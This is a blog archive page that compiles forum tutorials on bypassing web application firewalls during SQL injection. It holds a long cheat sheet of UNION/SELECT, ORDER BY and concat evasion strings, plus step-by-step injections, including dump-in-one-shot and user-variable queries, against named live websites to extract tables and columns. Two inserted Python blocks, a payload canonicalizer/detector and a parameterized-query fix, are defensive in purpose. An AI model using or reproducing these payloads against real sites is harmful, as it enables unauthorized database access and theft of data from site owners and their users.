Archive for February 2017
Now I'll show the different WAFs we face while injecting sites, with some examples:

example (1)
http://www.site.com/php?id=2 uNiOn-- - [waf]
http://www.site.com/php?id=2 SeLeCt -- - [no waf]
so here the word blocked by the firewall is "uNiOn", so your query should be like
http://www.site.com/php?id=2 /*!50000uNiOn*/ select 1,2,3,4,5-- -
note: sometimes using a combination of uppercase and lowercase will bypass the WAF,
so always use a combination of uppercase and lowercase,
like >> uNiOn SeLeCt
example (2)
http://www.site.com/php?id=2 uNiOn-- - [no waf]
http://www.site.com/php?id=2 SeLeCt-- - [no waf]
http://www.site.com/php?id=2 uNiOn SeLeCt [waf]
so here the firewall is blocking the combined use of union and select, so the WAF bypass should be applied between the union and select words
http://www.site.com/php?id=2 uNiOn DISTINCTROW SeLeCt 1,2,3,4,5-- -
(or)
http://www.site.com/php?id=2 uNiOn%23%0ASeLeCt 1,2,3,4,5-- -
%23 is the URL-encoded form of #
and
%0A is a line feed
the # (%23) starts a comment that would swallow the rest of the query, so the line feed (%0A) ends that comment and lets the rest of the query run
sometimes even after using
http://www.site.com/php?id=2 uNiOn DISTINCTROW SeLeCt 1,2,3,4,5-- - [waf]
it still blocks the query, so better use
http://www.site.com/php?id=2 /*!50000uNiOn*/ DISTINCTROW SeLeCt 1,2,3,4,5-- -
example (3)
http://www.site.com/php?id=2 uNiOn-- - [waf]
http://www.site.com/php?id=2 SeLeCt-- - [no waf]
http://www.site.com/php?id=2 uNiOn SeLeCt-- - [waf]
now let's try to bypass this
http://www.site.com/php?id=2 /*!50000uNiOn*/ SeLeCt-- - [waf]
http://www.site.com/php?id=2 /*!50000uNiOn*/ DISTINCTROW SeLeCt-- - [waf]
now let's try using URL encoding
http://www.site.com/php?id=2 %75nIOn SeLeCt -- -[waf]
http://www.site.com/php?id=2 %75nIOn %73eLeCt-- - [no waf]
here %75 => u and %73 => s (URL-encoded form)
example (4)
http://www.site.com/php?id=2 /*!50000union*/ DISTINCTROW /*!50000select*/ 1,2,3,4,5-- - [waf]
let's go step by step
http://www.site.com/php?id=2 /*!50000union*/-- - [no waf]
http://www.site.com/php?id=2 /*!50000union*/ DISTINCTROW /*!50000select*/-- - [no waf]
http://www.site.com/php?id=2 /*!50000union*/ DISTINCTROW /*!50000select*/ 1-- - [no waf]
http://www.site.com/php?id=2 /*!50000union*/ DISTINCTROW /*!50000select*/ 1,2-- - [waf]
if you observe, the WAF appeared after using a comma (,). Let's try to bypass this
http://www.site.com/php?id=2 /*!50000union*/ DISTINCTROW /*!50000select*/ 1,~~2-- - [no waf]
http://www.site.com/php?id=2 /*!50000union*/ DISTINCTROW /*!50000select*/ 1,~~2,~~3,~~4,~~5-- - [bypassed]
(or)
http://www.site.com/php?id=2 uNiOn(/**_**/(seLeCt(1),(2),(3),(4),(5))-- - [bypassed]
example (5)
I see some injectors using uNunionIOn without knowing the purpose of it.
When do you have to use uNunionIOn?
Let's see.
If you observe, whenever our query is incomplete the site will show an error on the page.
example
http://www.cobranet.org/about.php?id=1 union-- -
result >>
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1
you're getting this error because your query is incomplete, but on some sites when you use
http://www.site.com/php?id=2 union-- -
result >> the page does not show any error and loads normally; it means the
word union is being removed or escaped from our query, and in such a case we can use
uNuNionNion
and on some sites only specific letters are escaped
let's see this on a live site

http://zixem.altervista.org/SQLi/level3.php?item=3' uNiOn-- -
result >>
You have an error in your SQL syntax; check the manual that corresponds to
your MySQL server version for the right syntax to use near 'uni-- -'' at line 1
from the above error you can see some letters in the word union are being escaped,
so the letters being escaped have to be used twice to bypass this
http://zixem.altervista.org/SQLi/level3.php?item=3' uNiOnon-- - [bypassed]
result >> You have an error in your SQL syntax; check the manual that
corresponds to your MySQL server version for the right syntax to use near '' at line 1
http://zixem.altervista.org/SQLi/level3.php?item=-3' uNiOnon select 1,2,3,4-- -
and we got the vulnerable columns.
example (6)
sometimes the union or select word does not get through even after we have tried all the alternatives; then using some special characters may bypass the WAF.
uni<>on sel<>ect
uni*on sel*ect
(uni)(on) (sel)(ect)
uni[]on sel[]ect
uni\on sel\ect etc.
example (7)
on some sites we face a whitespace block, meaning whenever we use a space there
will be a WAF hit; there we can use comments with an odd number of asterisks (/*****/) in place of spaces,
or we can use
%0b
%0d
%C0 etc
>> www.site.com/php?id=2/*****/uNiOn/*****/select/*****/1,2,3,4,5-- -
www.site.com/php?id=2%0bunion%0bselect%0b1,2,3,4,5-- - etc
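A defender's counterpart to examples (1) to (7), added here as an example and not part of the original tutorial: before a keyword rule is applied, the parameter is canonicalized (percent-decoded until stable, MySQL version comments `/*!50000 ... */` reduced to their body because the server executes that body, other comments and the `#`/`--` line comments treated as whitespace, all whitespace variants collapsed, case folded), so the mixed-case, version-comment, `%23%0A`, `%75nion`, `/*****/`, `%0b` and parenthesis variants above all collapse to the same string. It also shows why the delete-the-keyword-once filter described in example (5) fails. The sample inputs are constructed from the patterns on this page with placeholder values, and the function names are my own. The caveat a practitioner needs: this makes a filter harder to slip past, but only parameterized queries remove the injection itself.

```python
import re
from urllib.parse import unquote_plus

# Constructed samples in the shape of the payload variants shown above
# (placeholder parameter values only). True = a canonicalizing rule should
# flag it, False = benign text that must not be flagged.
SAMPLES = [
    ("2 uNiOn SeLeCt 1,2,3,4,5-- -", True),                    # mixed case
    ("2 /*!50000uNiOn*/ select 1,2,3,4,5-- -", True),          # MySQL version comment
    ("2 uNiOn DISTINCTROW SeLeCt 1,2,3,4,5-- -", True),        # keyword between union/select
    ("2 uNiOn%23%0ASeLeCt 1,2,3,4,5-- -", True),               # '#' comment ended by a line feed
    ("2 %75nIOn %73eLeCt-- -", True),                          # URL-encoded letters
    ("2/*****/uNiOn/*****/select/*****/1,2,3,4,5-- -", True),  # comments as whitespace
    ("2%0bunion%0bselect%0b1,2,3,4,5-- -", True),              # vertical tab as whitespace
    ("2 uNiOn(/**_**/(seLeCt(1),(2),(3),(4),(5))-- -", True),  # parentheses instead of spaces
    ("%2575nion %2573elect", True),                            # double URL encoding (constructed)
    ("8' and @sqli:=(seLeCt concat/**/(version())) /*!50000UNION*/+SELECT+1,2,@sqli,4--+", True),
    ("42", False),
    ("union station", False),
]

VERSION_COMMENT = re.compile(r"/\*!\d{0,5}(.*?)\*/", re.S)  # /*!50000 body */ -> body (MySQL runs it)
PLAIN_COMMENT = re.compile(r"/\*.*?\*/", re.S)             # /* ... */ -> whitespace
LINE_COMMENT = re.compile(r"(#|--)[^\n]*")                  # '#...' or '--...' up to end of line
# \s already covers \t \n \x0b \x0c \r and \xa0; \ufffd is what a bare %C0 or %A0 decodes to.
WHITESPACE = re.compile(r"[\s\x00\ufffd]+")


def canonicalize(raw: str) -> str:
    """Reduce the encoding/comment/case variants to one comparable string."""
    s = raw
    for _ in range(3):                   # undo single and double URL encoding; '+' is a space
        decoded = unquote_plus(s)
        if decoded == s:
            break
        s = decoded
    s = VERSION_COMMENT.sub(r" \1 ", s)  # keep what MySQL would execute
    s = PLAIN_COMMENT.sub(" ", s)
    s = LINE_COMMENT.sub(" ", s)         # text after the comment's line feed survives
    s = WHITESPACE.sub(" ", s)
    return s.strip().lower()


UNION_SELECT = re.compile(r"\bunion\b[\s(]*(?:distinctrow|distinct|all)?[\s(]*\bselect\b")
USER_VAR_ASSIGN = re.compile(r"@\w*\s*:=")   # MySQL user-variable assignment, as in @sqli:=


def detect(raw: str) -> list[str]:
    """Labels for the canonicalized value; empty list means nothing matched."""
    canon = canonicalize(raw)
    hits = []
    if UNION_SELECT.search(canon):
        hits.append("union-select")
    if USER_VAR_ASSIGN.search(canon):
        hits.append("user-variable-assignment")
    return hits


def strip_keyword_once(value: str, keyword: str = "union") -> str:
    """The kind of filter example (5) describes: delete the keyword one time.
    Deleting leaves the surrounding letters to re-form the word; reject instead."""
    return re.sub(re.escape(keyword), "", value, count=1, flags=re.I)


def evaluate(samples=SAMPLES) -> tuple[int, int]:
    """(number of samples where flagged/not-flagged matches the label, total)."""
    correct = sum((detect(raw) != []) == expected for raw, expected in samples)
    return correct, len(samples)


if __name__ == "__main__":
    for raw, _ in SAMPLES:
        print(f"{raw!r:90} -> {canonicalize(raw)!r} {detect(raw)}")
    print("strip-once filter leaves:", strip_keyword_once("uNunionIOn"))
    print("agreement:", evaluate())
```

The `strip_keyword_once("uNunionIOn")` call returns `uNIOn`, which is exactly the tutorial's point about why a remove-the-word filter is no sanitizer. Canonicalization like this belongs in front of any signature rule, and a value that still changes between decode passes or that contains control characters is itself worth logging.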
the tutorial is getting bigger, so I'll continue it in the second part of WAF bypassing
hope you understood
[credits to masters yogesh bhagat sir, geek kid, aakash choudhary; I learned WAF bypassing from these people]
please give your feedback about my tutorial, thank you
cya.
source http://forum.sqliwiki.com/showthread.php?tid=4001
[~] order by [~]
----------------
/**/ORDER/**/BY/**/
/*!order*/+/*!by*/
/*!ORDER BY*/
/*!50000ORDER BY*/
/*!50000ORDER*//**//*!50000BY*/
/*!12345ORDER*/+/*!BY*/
[~] UNION select [~]
--------------------
/*!50000%55nIoN*/ /*!50000%53eLeCt*/
%55nion(%53elect 1,2,3)-- -
+union+distinct+select+
+union+distinctROW+select+
/**//*!12345UNION SELECT*//**/
/**//*!50000UNION SELECT*//**/
/**/UNION/**//*!50000SELECT*//**/
/*!50000UniON SeLeCt*/
union /*!50000%53elect*/
+ #?uNiOn + #?sEleCt
+ #?1q %0AuNiOn all#qa%0A#%0AsEleCt
/*!%55NiOn*/ /*!%53eLEct*/
/*!u%6eion*/ /*!se%6cect*/
+un/**/ion+se/**/lect
uni%0bon+se%0blect
%2f**%2funion%2f**%2fselect
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
REVERSE(noinu)+REVERSE(tceles)
/*--*/union/*--*/select/*--*/
union (/*!/**/ SeleCT */ 1,2,3)
/*!union*/+/*!select*/
union+/*!select*/
/**/union/**/select/**/
/**/uNIon/**/sEleCt/**/
+%2F**/+Union/*!select*/
/**//*!union*//**//*!select*//**/
/*!uNIOn*/ /*!SelECt*/
+union+distinct+select+
+union+distinctROW+select+
uNiOn aLl sElEcT
UNIunionON+SELselectECT
/**/union/*!50000select*//**/
0%a0union%a0select%09
%0Aunion%0Aselect%0A
%55nion/**/%53elect
uni<on all="" sel="">/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
%252f%252a*/UNION%252f%252a /SELECT%252f%252a*/
%0A%09UNION%0CSELECT%10NULL%
/*!union*//*--*//*!all*//*--*//*!select*/
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
+UnIoN/*&a=*/SeLeCT/*&a=*/
union+sel%0bect
+uni*on+sel*ect+
+#1q%0Aunion all#qa%0A#%0Aselect
union(select (1),(2),(3),(4),(5))
UNION(SELECT(column)FROM(table))
%23xyz%0AUnIOn%23xyz%0ASeLecT+
%23xyz%0A%55nIOn%23xyz%0A%53eLecT+
union(select(1),2,3)
union (select 1111,2222,3333)
uNioN (/*!/**/ SeleCT */ 11)
union (select 1111,2222,3333)
+#1q%0AuNiOn all#qa%0A#%0AsEleCt
/**//*U*//*n*//*I*//*o*//*N*//*S*//*e*//*L*//*e*//*c*//*T*/
%0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/
+%23sexsexsex%0AUnIOn%23sexsexs ex%0ASeLecT+
+union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
/*!f****U%0d%0aunion*/+/*!f****U%0d%0aSelEct*/
+%23blobblobblob%0aUnIOn%23blobblobblob%0aSeLe cT+
/*!blobblobblob%0d%0aunion*/+/*!blobblobblob%0d%0aSelEct*/
/union\sselect/g
/union\s+select/i
/*!UnIoN*/SeLeCT
+UnIoN/*&a=*/SeLeCT/*&a=*/
+uni>on+sel>ect+
+(UnIoN)+(SelECT)+
+(UnI)(oN)+(SeL)(EcT)
+?UnI?On?+'SeL?ECT?
+uni on+sel ect+
+/*!UnIoN*/+/*!SeLeCt*/+
/*!u%6eion*/ /*!se%6cect*/
uni%20union%20/*!select*/%20
union%23aa%0Aselect
/**/union/*!50000select*/
/^****union.*$/ /^****select.*$/
/*union*/union/*select*/select+
/*uni X on*/union/*sel X ect*/
+un/**/ion+sel/**/ect+
+UnIOn%0d%0aSeleCt%0d%0a
UNION/*&test=1*/SELECT/*&pwn=2*/
un?<ion sel="">+un/**/ion+se/**/lect+
+UNunionION+SEselectLECT+
+uni%0bon+se%0blect+
%252f%252a*/union%252f%252a /select%252f%252a*/
/%2A%2A/union/%2A%2A/select/%2A%2A/
%2f**%2funion%2f**%2fselect%2f**%2f
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
/*!UnIoN*/SeLecT+
[~] information_schema.tables [~]
---------------------------------
/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=schEMA()-- -
/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like schEMA()-- -
/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=database()-- -
/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like database()-- -
/*!FrOm*/+%69nformation_schema./**/columns+/*!50000Where*/+/*!%54able_name*/=hex table
/*!FrOm*/+information_schema./**/columns+/*!12345Where*/+/*!%54able_name*/ like hex table
[~] concat() [~]
----------------
CoNcAt()
concat()
CON%08CAT()
CoNcAt()
%0AcOnCat()
/**//*!12345cOnCat*/
/*!50000cOnCat*/(/*!*/)
unhex(hex(concat(table_name)))
unhex(hex(/*!12345concat*/(table_name)))
unhex(hex(/*!50000concat*/(table_name)))
[~] group_concat() [~]
----------------------
/*!group_concat*/()
gRoUp_cOnCAt()
group_concat(/*!*/)
group_concat(/*!12345table_name*/)
group_concat(/*!50000table_name*/)
/*!group_concat*/(/*!12345table_name*/)
/*!group_concat*/(/*!50000table_name*/)
/*!12345group_concat*/(/*!12345table_name*/)
/*!50000group_concat*/(/*!50000table_name*/)
/*!GrOuP_ConCaT*/()
/*!12345GroUP_ConCat*/()
/*!50000gRouP_cOnCaT*/()
/*!50000Gr%6fuP_c%6fnCAT*/()
unhex(hex(group_concat(table_name)))
unhex(hex(/*!group_concat*/(/*!table_name*/)))
unhex(hex(/*!12345group_concat*/(table_name)))
unhex(hex(/*!12345group_concat*/(/*!table_name*/)))
unhex(hex(/*!12345group_concat*/(/*!12345table_name*/)))
unhex(hex(/*!50000group_concat*/(table_name)))
unhex(hex(/*!50000group_concat*/(/*!table_name*/)))
unhex(hex(/*!50000group_concat*/(/*!50000table_name*/)))
convert(group_concat(table_name)+using+ascii)
convert(group_concat(/*!table_name*/)+using+ascii)
convert(group_concat(/*!12345table_name*/)+using+ascii)
convert(group_concat(/*!50000table_name*/)+using+ascii)
CONVERT(group_concat(table_name)+USING+latin1)
CONVERT(group_concat(table_name)+USING+latin2)
CONVERT(group_concat(table_name)+USING+latin3)
CONVERT(group_concat(table_name)+USING+latin4)
CONVERT(group_concat(table_name)+USING+latin5)
[~] after id no. like id=1 +/*!and*/+1=0 [~]
--------------------------------------------
+div+0
Having+1=0
+AND+1=0
+/*!and*/+1=0
and(1)=(0)
thanks
source

hello friends,
today we will discuss how to bypass hard WAF filters with a local variable. When the regular formats for dumping data are not working, this is a good alternative to try to bypass hard filters, though it won't work every time.
ok let's start.
I'll explain it on a live site,
site>> http://www.kantipurinternational.edu.np/ pages /facilities_details.php?id=8
and I got the vulnerable columns
http://www.kantipurinternational.edu.np/ pages/ facilities_details.php?id=.8' /*!50000UNION*/+SELECT+1,2,3,4--+
and let's dump tables and columns
http://www.kantipurinternational.edu.np/ pages/ facilities_details.php?id=.8' /*!50000UNION*/+SELECT+1,2,export_set(5,@:=0,(select+count(*)/*!50000from*/+/*!50000information_schema*/.columns+where@:=export_set(5,export_set(5,@,0x3c6c693e,/*!50000column_name*/,2),0x3a3a,/*!50000table_name*/,2)),@,2),4--+
result >> 403 forbidden
we have tried all the ways to bypass the WAF but they didn't work; now let's try with a local variable.
A local variable (the @name user variable used below) is simply a value holder: it holds a certain value and gives output when the command is executed. Let's see it practically.
see the query below: I opened a variable with the name "sqli" and stored a value there, and I placed that variable in the vulnerable column, which will show the output when the query is executed.
http://www.kantipurinternational.edu.np/ pages /facilities_details.php?id=.8' and @sqli:=(seLeCt concat/**/(version())) /*!50000UNION*/+SELECT+1,2,@sqli,4--+
output
![[Image: vxu1l.png]](https://i68.tinypic.com/vxu1l.png)
likewise, now let's dump data [tables and columns]
http://www.kantipurinternational.edu.np/....php?id=.8' and @sqli:=(select /*!50000GrOUp_ConCat(0x3c6c693e,/*!50000table_naMe*/,0x20203a3a2020,/*!50000ColuMN_naMe*/) FrOm /*!50000information_schema.columns*/ where table_schema=database/**_**/()) /*!50000UNION*/+SELECT+1,2,@sqli,4--+
and the output
![[Image: 2q8964g.png]](https://i65.tinypic.com/2q8964g.png)
hope you are clear with this, and that's all for this tutorial
my next tutorial will be on bypassing hard WAF filters with cookie-based injection.
please give your feedback about my tutorial
thank you
cya!
source http://forum.sqliwiki.com/showthread.php?tid=4164
Hello
Today I'm going to show you the SQLi (variable) method.
ok let's start:
1. First we will try to balance the query
site: http://www.unmpress.com/shell.php?Page=catalog
so we will put a backslash ( \ ) after catalog
the site gives us an error
pic: http://prntscr.com/8nzhm2
ok, now let's try to fix this error
http://www.unmpress.com/shell.php?Page=catalog') -- -
Done

query successfully fixed
pic: http://prntscr.com/8nzidy
ok, now let's try to inject this site

First we will find the total number of columns

http://www.unmpress.com/shell.php?Page=catalog') order by 1 -- - [ no error ]
http://www.unmpress.com/shell.php?Page=catalog') order by 2 -- - [ no error ]
http://www.unmpress.com/shell.php?Page=catalog') order by 3 -- - [ no error ]
http://www.unmpress.com/shell.php?Page=catalog') order by 4 -- - [ no error ]
http://www.unmpress.com/shell.php?Page=catalog') order by 5 -- - [ no error ]
http://www.unmpress.com/shell.php?Page=catalog') order by 6 -- - [ no error ]
http://www.unmpress.com/shell.php?Page=catalog') order by 7 -- - [ no error ]
http://www.unmpress.com/shell.php?Page=catalog') order by 8 -- - [ no error ]
http://www.unmpress.com/shell.php?Page=catalog') order by 9 -- - [ no error ]
http://www.unmpress.com/shell.php?Page=catalog') order by 10 -- - [ no error ]
http://www.unmpress.com/shell.php?Page=catalog') order by 11 -- - [ error ]
pic: http://prntscr.com/8nziwo
so it means the total number of columns is 10
ok, now we will find the vulnerable columns
http://www.unmpress.com/shell.php?Page=catalog') and 0 union select 1,2,3,4,5,6,7,8,9,10 -- -

Not Acceptable!
An appropriate representation of the requested resource could not be found on this server. This error was generated by Mod_Security.
Pic: http://prntscr.com/8nzk9t
don't worry, we will try to bypass it

site: http://www.unmpress.com/shell.php?Page=catalog') and 0 /*!50000union*/ /*!50000select*/ 1,2,3,4,5,6,7,8,9,10 -- -
pic: http://prntscr.com/8nzlb7
we found 3 vulnerable columns in total
columns 9, 3, 4
pic: http://prntscr.com/8nzlr6
now let's try to do DIOS in any column
I used DIOS in vulnerable column number 3
Code:
http://www.unmpress.com/shell.php?Page=catalog')
and 0 /*!50000union*/ /*!50000select*/
1,2,3,make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@),5,6,7,8,9,10
-- -
but it's not working

ok, now we will try something different: the Variable Method
as an example: and@x:=concat() union select 1,@x,3 -- -
in and@x:=, @x is the variable
you can use any name: @c, @b, @m, anything
the variable method is written like this: (and), then your variable such as @x, then a colon (:), then an equals sign (=), then your text or DIOS
and@x:=concat(database()) union select 1,@x,3 -- -
so if the vulnerable column is 2 then it shows you the database name, because you stored the database() function in your variable; so you can print version, database, user, etc.
ok now we will try it in our vulnerable site

Code:
http://www.unmpress.com/shell.php?Page
=catalog%27%29%20%20+and@x:=concat+%280x3c62723e,0x3c62723e,0x696e6a65637465642062792072303074786630726333,0x3c62723e,0x557365723a3a3a3a,USER%28%29,0x3c62723e,0x44423a3a3a3a,DATABASE%28%29,0x3c62723e,0x56657273696f6e3a3a3a3a,VERSION%28%29,0x3c62723e,0x3c62723e,@:=0,%28select+count%28*%29/*!50000from*/information_schema.columns+where+table_schema=database%28%29+and@:=concat+%28@,0x3c6c693e,table_name,0x3a3a,column_name%29%29,@%29/*!50000UNION*/SELECT++1,2,3,@x,5,6,7,8,9,10%20--%20-
Done, we succeeded


pic: http://prntscr.com/8nznr3
and sorry for my bad English :'(
Source http://forum.sqliwiki.com/showthread.php?tid=2
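Both the local-variable tutorial above and this variable-method post end the same way: a single unquoted request parameter (`id`, `Page`) is pasted into the SQL text, and every encoding trick is aimed at getting that text past a filter. Added example, not code from either post: the same lookup in its vulnerable and parameterized forms, run against a constructed in-memory SQLite table, plus a request wrapper that keeps database error text (the "You have an error in your SQL syntax" messages and the Mod_Security page quoted above are exactly what an attacker reads to balance the query) out of the response. The table, rows, payload and function names are my own; SQLite stands in for MySQL, so the payload uses a plain UNION rather than `@variables` or `/*!50000*/` comments, and the point does not depend on that.

```python
import logging
import sqlite3

log = logging.getLogger("facilities")


def make_db() -> sqlite3.Connection:
    """In-memory stand-in for the facilities table the tutorials query (constructed data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE facilities (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO facilities VALUES (?, ?)",
                     [(8, "Library"), (9, "Cafeteria")])
    conn.commit()
    return conn


# Constructed input in the shape used above: close the quoted literal, append a
# UNION that reads something the page never meant to show, comment out the rest.
PAYLOAD = "8' UNION SELECT 1, sqlite_version() -- -"


def lookup_concat(conn: sqlite3.Connection, page_id: str) -> list:
    """The vulnerable shape: user input becomes part of the SQL text, so the
    quote in page_id ends the literal and the appended UNION is executed."""
    sql = f"SELECT id, name FROM facilities WHERE id = '{page_id}'"
    return conn.execute(sql).fetchall()


def lookup_param(conn: sqlite3.Connection, page_id: str) -> list:
    """The fix: the value is bound as a parameter and is never parsed as SQL,
    whatever comments, encodings or keywords it contains."""
    return conn.execute("SELECT id, name FROM facilities WHERE id = ?",
                        (page_id,)).fetchall()


GENERIC_ERROR = "Unable to load page."


def handle_request(conn: sqlite3.Connection, page_id: str, lookup=lookup_param) -> dict:
    """Request wrapper: database errors go to the server log and never to the client,
    so a malformed parameter yields no syntax details to steer further attempts."""
    try:
        return {"ok": True, "rows": lookup(conn, page_id)}
    except sqlite3.Error as exc:
        log.warning("query failed for page_id=%r: %s", page_id, exc)
        return {"ok": False, "error": GENERIC_ERROR}


if __name__ == "__main__":
    db = make_db()
    print("concat + payload:", lookup_concat(db, PAYLOAD))                # second row is the DB version
    print("param  + payload:", lookup_param(db, PAYLOAD))                 # no rows: value is just data
    print("param  + '8':    ", lookup_param(db, "8"))                     # the legitimate lookup
    print("concat + unbalanced quote:", handle_request(db, "8'", lookup_concat))  # generic error only
```

The parameterized path returns an empty result for the payload rather than an error, which is the behaviour that makes the "balance the query" step in both posts impossible: there is no literal to break out of. Error suppression is secondary but still matters, since the verbose messages quoted in the tutorials are what turn a blind guess into a confirmed injection point.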
--'- : +--+ / : -- - : --+- : /*
) order by 1-- -
') order by 1-- -
')order by 1%23%23
%')order by 1%23%23
Null' order by 100--+
Null' order by 9999--+
')group by 99-- -
'group by 119449-- -
'group/**/by/**/99%23%23
union select ByPassing method
+union+distinct+select+
+union+distinctROW+select+
/**//*!12345UNION SELECT*//**/
/**//*!50000UNION SELECT*//**/
+/*!50000UnIoN*/ /*!50000SeLeCt aLl*/+
+/*!u%6eion*/+/*!se%6cect*/+
/**/uniUNIONon/**/aALLll/**/selSELECTect/**/
1%')and(0)union(select(1),version(),3,4,5,6)%23%23%23
/*!50000%55nIoN*/+/*!50000%53eLeCt*/
union /*!50000%53elect*/
%55nion %53elect
+--+Union+--+Select+--+
+UnIoN/*&a=*/SeLeCT/*&a=*/
id=1+’UnI”On’+'SeL”ECT’
id=1+'UnI'||'on'+SeLeCT'
UnIoN SeLeCt CoNcAt(version())--
uNiOn aLl sElEcT
uUNIONnion all sSELECTelect